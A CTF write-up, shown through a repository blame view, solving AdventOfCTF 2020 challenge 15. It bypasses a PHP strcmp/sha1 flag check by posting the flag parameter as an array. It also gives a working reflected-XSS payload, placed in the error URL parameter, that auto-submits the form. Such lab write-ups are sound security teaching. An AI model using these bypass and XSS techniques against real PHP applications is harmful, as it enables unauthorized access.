maik
/
Personal-Website
mirror of https://github.com/maikka39/Personal-Website.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Repo for my website
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
196 Commits
2 Branches
2 Tags
80 MiB
Tag: Branch: Tree: 8c787ec1d3
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '8c787ec1d3'
${ noResults }
Personal-Website/content/writeups/adventofctf/2020/challenge_15.md

101 lines
3.1 KiB
Raw Normal View History Unescape

Add writeup for challenge 15
4 years ago
+++
author = "Maik de Kruif"
Set actual titles of the challenges as I only just found them
3 years ago
title = "Juggler++"
Restructure writeups
3 years ago
subtitle = "Challenge 15 - AdventOfCTF"
Add writeup for challenge 15
4 years ago
date = 2020-12-31T22:34:24+01:00
description = "A writeup for challenge 15 of AdventOfCTF."
Restructure writeups
3 years ago
cover = "img/writeups/adventofctf/2020/9c6afd807a15973b962cf3aee3dbe836.png"
Add writeup for challenge 15
4 years ago
tags = [
"AdventOfCTF",
"challenge",
"ctf",
"hacking",
"writeup",
"web",
"php",
]
categories = [
"ctf",
"writeups",
"hacking",
]
Add breadcrumbs, let writeup urls make more sense and add section pages
3 years ago
aliases = [
"challenge_15"
]
Add writeup for challenge 15
4 years ago
+++
- Points: 1500
## Description
We have now created a flag verifier service. Enter a flag to see if it matches the challenge you are trying to solve.
Visit <https://15.adventofctf.com> to start the challenge.
## Recon
Upon opening the challenge website we're greeted with some PHP code:
```php
<?php
ini_set('display_errors', 0);
include("flag.php");
if (isset($_POST["flag"])) {
$f = $_POST["flag"];
if (strcmp($f, $flag) == 0 || sha1($flag) == sha1($f)) {
echo $flag;
die();
}
}
header("Location: /index.php?error=Wrong flag");
exit();
```
Besides this code, we also get an input field for the contents of the `flag` parameter.
## Finding the vulnerability
When scanning this code, we see that `$flag` is compared to our input. It firstly does a `strcmp`, and, if it is not `0`, it checks if the `sha1` hashes of both variables are equal.
Restructure writeups
3 years ago
The thing with PHP and `strcmp` is that PHP will do some type juggling before checking the values. You can read more about PHP type juggling in the [writeup of yesterday's challenge]({{% ref "writeups/adventofctf/2020/challenge_14.md" %}}#type-juggling).
Add writeup for challenge 15
4 years ago
## Exploit
This time, however, we have to use type juggling in a different way. In PHP, we can also pass arrays as a parameter. We do this by placing brackets after the parameter name like so: `flag[]=a`. And this is exactly how we solve it.
This works as `strcmp("string", [])` will always return 0 because PHP.
We can either use software like burp repeater or cURL to manually create a request, or change the contents of the `name` attribute to `flag[]`.
## Solution
After then making the request, we get the flag: `NOVI{typ3_juggl1ng_f0r_l1fe_seriously}`.
This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#15-16).
## Extra
Because this challenge also has an XSS vulnerability, we can use it to solve the challenge automatically for us.
To do this, we firstly have to create some HTML code which executes some javascript code which then actually solves the challenge.
I came up with the following code:
```html
<script>
setTimeout(() => {
let flagInput = document.getElementById("flag");
flagInput.name = "flag[]";
flagInput.value = "hi";
flagInput.form.submit();
}, 1000);
</script>
```
If we then put this in the `error` parameter in the URL, it will solve the challenge automatically. The resulting URL is the following: `https://15.adventofctf.com/index.php?error=<script>setTimeout(()=>{let flagInput=document.getElementById("flag");flagInput.name="flag[]";flagInput.value="hi";flagInput.form.submit()},1000)</script>`.